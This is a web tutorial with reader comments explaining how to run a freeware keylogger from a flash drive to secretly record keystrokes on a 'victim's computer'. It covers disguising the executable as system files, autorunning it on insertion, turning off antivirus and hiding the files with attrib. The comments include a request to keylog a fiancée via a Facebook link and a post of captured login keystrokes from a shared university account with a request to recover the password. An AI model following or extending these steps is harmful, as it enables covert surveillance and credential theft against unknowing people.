Easy Software Keylogger Using Shadow Keylogger




Intro: Easy Software Keylogger Using Shadow Keylogger

If you have been on the internet and not living under a rock the last decade you should know what a keylogger is. It is a small application that runs in the background of a computer invisibly and records all keystrokes made on a computer. Some are as advanced enough to capture screenshots, IM logs, video, audio, webcam, etc. but these usually cost alot of money upwards of $100! In this instructable i will explain how to put a freeware keylogger on a flash drive and easily record the keystrokes of the victims computer.

NOTE: I am not responsible for what you do with this information. This is intended for learning purposes and use on YOUR OWN computer.

Step 1: You Will Need...

This instructable is simple and very straight forward, and assuming you already have a flash drive, free as well.

What you will need...

1.) A flash drive. I would recommend at least a one gigabyte.

2.) Shadow Keylogger (freeware) available for download from cnet.com  here

3.) A victim's computer

Step 2: This Is Optional...

This instructable goes great when used on a encrypted drive.

- Keeps you doings secret
- Allows a safe place to store logs

- Makes a longer setup time
- More noticeable

If you want to use a encrypted drive, follow my other instructable before continuing with this one.

Step 3: Download and Load Up...

After downloading the Shadow Keylogger Freeware the setup is very straight forward.

Simply place the shadow keylogger.exe into a folder in the flash drive labeled something non-conspicuous like "SystemFiles" and rename the keylogger as "system".

Step 4: Make a Autorun File...

Now we will create a autorun.inf file which when put in the root folder of your flash drive will tell the computer to automatically start the keylogger application.

copy the following...

action=Open Keylogger

NOTE: If you named the folder or exe something different then systemfiles and system then change the script to accommodate your situation.

Save this file as autorun.inf and put it in the root directory of your flash drive

Step 5: Advanced Options...

If you thought that was all to this instructable you were wrong. Within the Keylogger software there is an advanced button this include the directory in which the log is saved. this is usefull and should be changed to your flash drive. There is also a option to capture screenshots but be careful about the screenshots as they can fill up a flash drive quickly if running for an extended period of time.

Step 6: Try It Out...

Next try it by unplugging your flash drive and plugging it back in. if the autorun file works correctly a box prompting for a password should appear. Now just type in your password and click finish. Next type in your password again and click record.

If it does not auto start on detection you can start it manually by simply clicking on the exe file in the flash drive.

Once running the keylogger will appear in the task bar as a whatever it is set as for a disguise. to access the log simply click on this icon and type in your password and you may view the log as well as save the record.

Please note that once the flashdrive is removed the keylogger will not remain active as it does not install into the system. Some anti-viruses may also have a problem with this so it is recommended that either you shut off the anti-virus manually or add an exception. I will not go into detail on how to do this as every anti-virus is different and i do not have time to cover them all.



  • Metalworking Contest

    Metalworking Contest
  • Furniture Contest 2018

    Furniture Contest 2018
  • Tiny Home Contest

    Tiny Home Contest

48 Discussions

Jose MariB1

1 year ago

send me one please
really hard to find nowadays


2 years ago

Nice topic


2 years ago

can't download shadow keylogger !

Can you give an another link please ?


3 years ago on Step 3

Hardware keylogger? It is easy to be found! I think keylogger software like Micro Keylogger is better than hardware keylogger, works invisibly. http://www.microkeylogger.com/

2 replies
trentfo jasonkaven

Reply 3 years ago

How do you make a key logger using that program?


Reply 3 years ago on Introduction

It provides a free trial one, you can download it and unpack it to learn how to make a keylogger. I think it is a very good keylogger.


3 years ago on Step 3

Hardware keylogger? It is easy to be found! I think keylogger software like Micro Keylogger is better than hardware keylogger, works invisibly. http://www.microkeylogger.com/


3 years ago on Introduction

i am using windos 8 and it opens the folder itself, i want that the shadow keylogger runs itself even without clicking the sk.exe.. is there any way to run without clicking???


3 years ago on Introduction


how are you?hope u will be fine

i hav doubt on my fiuancee that she is cheating me thats why i will send a kylogger link through facebook n she will download so i need a keylogger software and plz in keylogger set my email adress where i can receive all information raheelisrock@gmail.com


4 years ago on Introduction

But how does it work when you put the flash drive in someones computer?

Don't you need to install the keylogger on his computer too?

Sorry for poor english


4 years ago on Step 6

how i can disable the big box after i end the keylogger session


4 years ago on Introduction

Just to throw it out there in the community

If you want to hide your autorun.inf and your sk.exe, you can easily run this command in the command prompt:

attrib thing.ext +s +h

It hides files. On my computer you cannot even find these files when you activate "Hidden Files" in "view".


4 years ago on Step 4

Well, I'm using Spyrix keylogger and I'm happy with it..it is undetectable..so it works for the purpose.


4 years ago on Introduction

Thanks for great tutorial for using keylogger on computer.

I have been using Spyrix for last one year, the installation process is really very easy.


Reply 4 years ago on Introduction

I will not give you any information on embedding a keylogger in a website. There is no reason to do so other than malicious activity. Besides this is a very basic setup, in order for it to not be instantly detected by antivirus', it would need to be encrypted in such a way that the antivirus does not read it as a virus.


5 years ago on Introduction

Hi guys,

If you could help with my problem, I really appreciated it!

My name is Leonel and I am a master finance student at USP, in Brazil. Everyday I must go to the university just for use thomson one database. I tried use Shadow Keylogger software and its great, but I have problem with the password. What appears is:

Program Manager (5/4/2013 18:49:21):

Thomson One - Windows Internet Explorer (5/4/2013 18:51:13):
biblioteca.ref.sp2fgv.bt[Left Arrow][delete]r

(user *biblioteca.ref.sp@fgv.br* is correct!)

bkabto[delete][delete][delete][delete][Right Arrow][Right Arrow].refbkabto[Left Arrow][delete]

(password isn't refbkabto - that's my problem!)

Other day appears eebbkabto. In other words, kabto always appears. This is what turns on a lamp in my head! Is clear to me that the password is, somehow, encrypted. But how? The weblink is:


If yes, what type of encrypted is used? I have a source of the page, after loging (attached). I don't know how it works, but it look like a Javascript. Is the correct? In this case, what can I do?

Please, help me!!!

Very thanks!

Leonel Carlos